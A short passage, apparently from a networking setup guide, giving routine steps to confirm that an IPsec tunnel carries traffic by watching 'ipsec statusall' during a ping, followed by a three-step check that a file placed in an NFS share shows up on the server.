Step 2: On the other side, watch the status using the command “sudo watch ipsec statusall” (if the number of packets and the number of bytes increase while the ping is running, things are running the way they should be).
NFS Test
Step 1: Start the NFS server and client.
Step 2: Put a file in the shared folder on the client.
Step 3: At the server side, check whether the file exists.